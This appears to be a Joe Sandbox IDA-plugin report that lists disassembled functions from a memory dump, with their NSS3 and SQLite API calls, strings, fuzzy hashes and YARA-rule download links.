Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 9329370773f1b24d193f20a6cd5b84457806972c575ae4e1e7853b56c76439b6
Instruction ID: 9466dd082e1aebb472af531ac803cd043f1d50c61b2a0f87f5108749261fc3c9
Opcode Fuzzy Hash: 9329370773f1b24d193f20a6cd5b84457806972c575ae4e1e7853b56c76439b6
Instruction Fuzzy Hash: 8751B1B5904602AFDB49DF25C885B2AB7B4FF48318F008965ED1997E11E731F8A4CBD2

Function 6D524CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6D52AB7F,?,00000000,?), ref: 6D524CB4
EnterCriticalSection.KERNEL32(0000001C,?,6D52AB7F,?,00000000,?), ref: 6D524CC8
TlsGetValue.KERNEL32(?,6D52AB7F,?,00000000,?), ref: 6D524CE0
EnterCriticalSection.KERNEL32(?,?,6D52AB7F,?,00000000,?), ref: 6D524CF4
PL_HashTableLookup.NSS3(?,?,?,6D52AB7F,?,00000000,?), ref: 6D524D03
PR_Unlock.NSS3(?,00000000,?), ref: 6D524D10

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

PR_Now.NSS3(?,00000000,?), ref: 6D524D26

Part of subcall function 6D5C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DC6
Part of subcall function 6D5C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DD1
Part of subcall function 6D5C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5C9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6D524D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6D524DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6D524E02

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 47800693e3bcbd7e2502927631657c7504559a94389f357ab8de3046a5549d7d
Instruction ID: 9c12e20e6fa024dee19ac25320cc10cd3828dd7c3661de73fff2066a6de5051b
Opcode Fuzzy Hash: 47800693e3bcbd7e2502927631657c7504559a94389f357ab8de3046a5549d7d
Instruction Fuzzy Hash: 4841F9B5904102ABEB059F28EC40A2A77B8FF59258F064570ED19C7B51FB31DD64CBE2

Function 6D50BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D50BFFB

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6D50C015

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6D50C032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6D50C04D

Part of subcall function 6D5569E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D556A47
Part of subcall function 6D5569E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6D556A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6D50C064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6D50C07B

Part of subcall function 6D508980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6D507310), ref: 6D5089B8
Part of subcall function 6D508980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6D507310), ref: 6D5089E6
Part of subcall function 6D508980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6D508A00
Part of subcall function 6D508980: CERT_CopyRDN.NSS3(00000004,00000000,6D507310,?,?,00000004,?), ref: 6D508A1B
Part of subcall function 6D508980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6D508A74

Part of subcall function 6D501D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6D50C097,00000000,000000B0,?), ref: 6D501D2C
Part of subcall function 6D501D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6D50C09B,00000000,00000000,00000000,?,6D50C097,00000000,000000B0,?), ref: 6D501D3F
Part of subcall function 6D501D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6D50C087,00000000,000000B0,?), ref: 6D501D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6D50C0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6D50C0C9

Part of subcall function 6D512DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6D50C0D2,6D50C0CE,00000000,-000000D4,?), ref: 6D512DF5
Part of subcall function 6D512DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6D50C0CE,00000000,-000000D4,?), ref: 6D512E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6D50C0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D50C0E3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: 759aa7527c802666b2e563b4f0ac50dd70c7ad3bf3731f09c6f9acadbdd2c70d
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: F92192E6A4420667FB055A60AC82FBB366C9B8275DF088434FE04DA546FB26D915C2B2

Function 6D5289C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6D52AE9B,00000000,?,?), ref: 6D5289DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6D502D6B,?,?,00000000), ref: 6D5289EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6D502D6B), ref: 6D528A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6D502D6B,?), ref: 6D528A11

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 700cb5234622f08260dec5c38cb5a0bf2c461605b59cfb1901a33db09f900c26
Instruction ID: a31ac36e4573e558954a05d0c56d0fdd3c530ee1665279e765fef83f29e0c71d
Opcode Fuzzy Hash: 700cb5234622f08260dec5c38cb5a0bf2c461605b59cfb1901a33db09f900c26
Instruction Fuzzy Hash: FA113DF1A0420157FB0596A56C81B7B3A58AB8076DF084431EE099A9C2FF22DC1CC1F3

Function 6D502E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6D502CDA,?,00000000), ref: 6D502E1E

Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D509003,?), ref: 6D55FD91
Part of subcall function 6D55FD80: PORT_Alloc_Util.NSS3(A4686D56,?), ref: 6D55FDA2
Part of subcall function 6D55FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686D56,?,?), ref: 6D55FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6D502E33

Part of subcall function 6D55FD80: free.MOZGLUE(00000000,?,?), ref: 6D55FDD1

TlsGetValue.KERNEL32 ref: 6D502E4E
EnterCriticalSection.KERNEL32(?), ref: 6D502E5E
PL_HashTableLookup.NSS3(?), ref: 6D502E71
PL_HashTableRemove.NSS3(?), ref: 6D502E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6D502E96
PR_Unlock.NSS3 ref: 6D502EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D502EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6D502EC5

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 691f6037dc1c013b99c708006da5cf259e37e885bcde338838da972bfc58b978
Instruction ID: b76258c6f30339cca6d96c722fcb3da018fc30e79b6098b1c160079cbc496446
Opcode Fuzzy Hash: 691f6037dc1c013b99c708006da5cf259e37e885bcde338838da972bfc58b978
Instruction Fuzzy Hash: E2210776844101A7EF255B26EC01BBB3B75EBD6349F090435EF1886221FB32D965C6E2

Function 6D4EFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6D4EFD18
sqlite3_initialize.NSS3 ref: 6D4EFD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6D4EFD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6D4EFD99
sqlite3_free.NSS3(00000000), ref: 6D4EFE3C
sqlite3_free.NSS3(?), ref: 6D4EFEE3
sqlite3_free.NSS3(?), ref: 6D4EFEEE

Strings

simple, xrefs: 6D4EFC79

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: bb489918aa7c4eb39018baa32519b24175ffd041c9f8c56e7001450e6793b46d
Instruction ID: 5ee21fd55f556b8ac979bcec46387da81ec4b3ef4b38078a0d838ae8ae5dcfbf
Opcode Fuzzy Hash: bb489918aa7c4eb39018baa32519b24175ffd041c9f8c56e7001450e6793b46d
Instruction Fuzzy Hash: B7918EB0A05206AFDB04CF59D880E6ABBB2FF84355F25C568D8199B352E731ED01CB90

Function 6D4F5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D4F5EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4F5EED

Strings

misuse, xrefs: 6D4F5EDB
API call with %s database connection pointer, xrefs: 6D4F5EC3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4F5ED1
unable to close due to unfinalized statements or unfinished backups, xrefs: 6D4F5E64
invalid, xrefs: 6D4F5EBE
%s at line %d of [%.10s], xrefs: 6D4F5EE0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 89d6ecd6ad421917a13ff3ef56bd6bb4ee9d0db3ba7ef954e9d0bbac059a2d87
Instruction ID: 0e50f16a5354defd283f14e414d2495fdf1d67971ab38a3f9f4ec9975bcd739f
Opcode Fuzzy Hash: 89d6ecd6ad421917a13ff3ef56bd6bb4ee9d0db3ba7ef954e9d0bbac059a2d87
Instruction Fuzzy Hash: 2D817A30A0A6929BEB19CF28D858F7A7760BF81708F25C169D8159B761C730EC43CBA1

Function 6D4DDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D4DDDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4DDE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4DDE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D4DDEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D4DDF78

Strings

database corruption, xrefs: 6D4DDE5C, 6D4DDE8B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4DDE52, 6D4DDE81
%s at line %d of [%.10s], xrefs: 6D4DDE61, 6D4DDE90

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 46fac5d2f7bc2b13aae329df91b9c9e0789509afb39b56b7a0b8bae5f4ad1166
Instruction ID: 42e5a91f1e65e94123967b76ea121ff67cbb1cc372a026967c577a55d523f9d2
Opcode Fuzzy Hash: 46fac5d2f7bc2b13aae329df91b9c9e0789509afb39b56b7a0b8bae5f4ad1166
Instruction Fuzzy Hash: 058182716087419FDB54CF29C8A0F2A77F1BF89304F11886DE99A8B252E735EC45CB92

Function 6D48CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6D48B999), ref: 6D48CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6D48B999), ref: 6D48D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6D48B999), ref: 6D48D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6D48B999), ref: 6D5D972B

Strings

database corruption, xrefs: 6D48CFE7, 6D48D013, 6D48D028, 6D48D039, 6D48D03E, 6D5D9786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D48CFDD, 6D48D00E, 6D48D022, 6D48D033, 6D5D9780
%s at line %d of [%.10s], xrefs: 6D48CFEC, 6D48D018, 6D48D029, 6D48D03F, 6D5D978B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 8bab98e11ace4ff5a56acb8460c80ffdfc83cb97a728fa2a6a6bca272efa353a
Instruction ID: 59f6fe4423e9a7461a0cd3976ad6ebcb393d629c4ad75df5eecee2b5c846c425
Opcode Fuzzy Hash: 8bab98e11ace4ff5a56acb8460c80ffdfc83cb97a728fa2a6a6bca272efa353a
Instruction Fuzzy Hash: F4610571A042208BD310CF2DC840BA7B7E5BF95318F29866DE5499B782D776EC46CBA1

Function 6D58FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D595B40: PR_GetIdentitiesLayer.NSS3 ref: 6D595B56

PK11_FreeSymKey.NSS3(00000000), ref: 6D590113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D590130
PORT_Alloc_Util.NSS3(00000040), ref: 6D59015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6D5901AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6D590202
free.MOZGLUE(?), ref: 6D590224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D590253

Strings

exporter, xrefs: 6D5900F7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: 4374ec875369612c8ef6a2758b2b0482286338fe58ae6a4007c43470a9925036
Instruction ID: 8ab42e63f0a9504c08839123a8272521cb050d92232a67857704be3059be59b4
Opcode Fuzzy Hash: 4374ec875369612c8ef6a2758b2b0482286338fe58ae6a4007c43470a9925036
Instruction Fuzzy Hash: CD612371D0438A9BEF098FAECC00BFE77B6FF84308F05492AEA195A561E731A950D741

Function 6D564DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6D56536F,00000022,?,?,00000000,?), ref: 6D564E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6D564F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6D564F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6D564FAE
free.MOZGLUE(?), ref: 6D564FC8

Strings

%s=%c%s%c, xrefs: 6D564FA9
oSVm", xrefs: 6D564DFB, 6D564EF4, 6D564EC5
%s=%s, xrefs: 6D564F89

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSVm"
API String ID: 2709355791-1360835095
Opcode ID: a2aa5198053eabc1a05862b54b2334e584a048dff49312ce9362a6250113d627
Instruction ID: 3fc4f3f0eda19274b08c6178155eb6352a1d4b9dcab5d27c25c1d624ec4efd41
Opcode Fuzzy Hash: a2aa5198053eabc1a05862b54b2334e584a048dff49312ce9362a6250113d627
Instruction Fuzzy Hash: F9511721A0C1D78BEB09CA7984B07FFBBB5AF4A304F144526E894A7B61D3258C4587B2

Function 6D58EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6D5AA4A1,?,00000000,?,00000001), ref: 6D58EF6D

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

htonl.WSOCK32(00000000,?,6D5AA4A1,?,00000000,?,00000001), ref: 6D58EFE4
htonl.WSOCK32(?,00000000,?,6D5AA4A1,?,00000000,?,00000001), ref: 6D58EFF1
memcpy.VCRUNTIME140(?,?,6D5AA4A1,?,00000000,?,6D5AA4A1,?,00000000,?,00000001), ref: 6D58F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6D5AA4A1,?,00000000,?,00000001), ref: 6D58F027

Strings

dtls13, xrefs: 6D58EF33

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity
